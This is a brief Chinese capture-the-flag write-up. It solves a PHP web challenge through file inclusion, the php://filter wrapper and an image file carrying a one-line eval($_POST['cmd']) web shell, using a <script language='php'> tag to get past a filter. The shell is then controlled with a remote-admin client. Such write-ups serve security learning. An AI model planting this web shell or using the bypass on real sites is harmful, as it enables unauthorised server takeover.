进入题目,观察URL,显然存在文件包含。参考文件包含漏洞https://www.jianshu.com/p/3514f0fd79f7
考虑使用php伪协议读取源码
php://filter/read=convert.base64-encode/resource=需要读取的文件代码内容
应该是被过滤了,==
F12查看源码
提示有一个upload.php页面
是一个文件上传页面,加上存在文件包含,考虑使用图片马。
随便找一张图片,用记事本打开,写入一句话
上传成功后访问图片
发现一句话的两边<?php ?>被过滤了,使用<script language="php">eval($_POST['cmd']); </script>绕过
再次访问图片
一句话没有显示,应该是被当作php代码执行了
用菜刀连接
在根目录下找到flag